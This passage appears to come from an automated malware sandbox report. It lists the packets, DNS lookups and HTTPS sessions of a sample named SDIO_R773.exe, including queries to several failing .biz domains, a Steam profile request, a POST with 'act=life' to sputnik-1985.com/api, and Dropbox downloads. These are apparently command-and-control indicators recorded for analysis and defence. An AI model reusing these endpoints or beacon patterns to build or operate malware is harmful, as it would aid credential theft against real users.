                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.218480110 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.218542099 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.221803904 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.221808910 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.222197056 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.223510027 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:35.267335892 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066401958 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066548109 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066561937 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066581964 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.066683054 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.068028927 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.068028927 CET49748443192.168.2.4162.125.66.18
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.068042994 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.068051100 CET44349748162.125.66.18192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.092649937 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.092694998 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.094801903 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.095074892 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.095091105 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.745949984 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.746076107 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.746130943 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.746195078 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.747773886 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.747790098 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.748203993 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.749325037 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.791322947 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.054965973 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.107815981 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.107845068 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108242035 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108273029 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108294964 CET49749443192.168.2.4162.125.66.15
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108581066 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108664036 CET44349749162.125.66.15192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:37.108719110 CET49749443192.168.2.4162.125.66.15

                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.830060005 CET4959653192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.840543985 CET53495961.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.845376015 CET5148953192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.854562044 CET53514891.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.856093884 CET6056853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.865309000 CET53605681.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.866796970 CET5137453192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.876123905 CET53513741.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.879120111 CET6373353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.888009071 CET53637331.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.890122890 CET6450453192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.898674965 CET53645041.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.902409077 CET6522353192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.911283970 CET53652231.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.913264036 CET5577253192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.922254086 CET53557721.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.924127102 CET5911853192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.931308985 CET53591181.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.211045980 CET5770653192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET53577061.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.527036905 CET5697553192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.533921003 CET53569751.1.1.1192.168.2.4
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.069113016 CET6294453192.168.2.41.1.1.1
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.091603041 CET53629441.1.1.1192.168.2.4

                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.830060005 CET192.168.2.41.1.1.10xedf3Standard query (0)punishzement.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.845376015 CET192.168.2.41.1.1.10xc11aStandard query (0)fraggielek.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.856093884 CET192.168.2.41.1.1.10x9b19Standard query (0)grandiouseziu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.866796970 CET192.168.2.41.1.1.10x151Standard query (0)littlenotii.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.879120111 CET192.168.2.41.1.1.10x8b63Standard query (0)marketlumpe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.890122890 CET192.168.2.41.1.1.10xda5fStandard query (0)nuttyshopr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.902409077 CET192.168.2.41.1.1.10xd136Standard query (0)spookycappy.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.913264036 CET192.168.2.41.1.1.10xff9bStandard query (0)truculengisau.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.924127102 CET192.168.2.41.1.1.10xf9b7Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.211045980 CET192.168.2.41.1.1.10x31acStandard query (0)sputnik-1985.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.527036905 CET192.168.2.41.1.1.10xdcb8Standard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.069113016 CET192.168.2.41.1.1.10x1ef8Standard query (0)uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.840543985 CET1.1.1.1192.168.2.40xedf3Name error (3)punishzement.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.854562044 CET1.1.1.1192.168.2.40xc11aName error (3)fraggielek.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.865309000 CET1.1.1.1192.168.2.40x9b19Name error (3)grandiouseziu.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.876123905 CET1.1.1.1192.168.2.40x151Name error (3)littlenotii.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.888009071 CET1.1.1.1192.168.2.40x8b63Name error (3)marketlumpe.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.898674965 CET1.1.1.1192.168.2.40xda5fName error (3)nuttyshopr.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.911283970 CET1.1.1.1192.168.2.40xd136Name error (3)spookycappy.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.922254086 CET1.1.1.1192.168.2.40xff9bName error (3)truculengisau.biznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:10.931308985 CET1.1.1.1192.168.2.40xf9b7No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET1.1.1.1192.168.2.40x31acNo error (0)sputnik-1985.com104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET1.1.1.1192.168.2.40x31acNo error (0)sputnik-1985.com104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET1.1.1.1192.168.2.40x31acNo error (0)sputnik-1985.com104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET1.1.1.1192.168.2.40x31acNo error (0)sputnik-1985.com104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET1.1.1.1192.168.2.40x31acNo error (0)sputnik-1985.com104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET1.1.1.1192.168.2.40x31acNo error (0)sputnik-1985.com104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:12.223140001 CET1.1.1.1192.168.2.40x31acNo error (0)sputnik-1985.com104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.533921003 CET1.1.1.1192.168.2.40xdcb8No error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:34.533921003 CET1.1.1.1192.168.2.40xdcb8No error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.091603041 CET1.1.1.1192.168.2.40x1ef8No error (0)uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Jan 11, 2025 11:56:36.091603041 CET1.1.1.1192.168.2.40x1ef8No error (0)edge-block-www-env.dropbox-dns.com162.125.66.15A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                            • steamcommunity.com
                                                                                                                                                                                                                                            • sputnik-1985.com
                                                                                                                                                                                                                                            • www.dropbox.com
                                                                                                                                                                                                                                            • uca3ce58b2740dd4c68b9a7532f7.dl.dropboxusercontent.com

                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.449733104.102.49.2544437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:11 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Host: steamcommunity.com
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                            Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:12 GMT
                                                                                                                                                                                                                                            Content-Length: 35126
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Set-Cookie: sessionid=698f4fb8a7022c28f9fbd017; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                            Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC16384INData Raw: 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f
                                                                                                                                                                                                                                            Data Ascii: ity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPO
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC3768INData Raw: 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 73 6f 6e 61 5f
                                                                                                                                                                                                                                            Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC495INData Raw: 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                            Data Ascii: criber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div clas


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.449734104.21.64.14437528C:\Users\user\Desktop\SDIO_R773.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                            Host: sputnik-1985.com
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC550INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                            Date: Sat, 11 Jan 2025 10:56:12 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Tzbaan%2BbMZdyza9E272uibNSfg7z6UnnCwAGXLx0u7W4u5ZuO4Y5bIz4JqTcM3eNkZKRC12A0S83xHaYDRgPB6nAfihUeGTeFK08wuc3QVp6Kj8FuB4uPxotxq5PpGxf%2BK3a"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 900460ffcfa77c6a-EWR
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC819INData Raw: 31 31 63 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                                                                            Data Ascii: 11c4<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC1369INData Raw: 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69
                                                                                                                                                                                                                                            Data Ascii: f.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cooki
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC1369INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e
                                                                                                                                                                                                                                            Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn
                                                                                                                                                                                                                                            2025-01-11 10:56:12 UTC999INData Raw: 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26
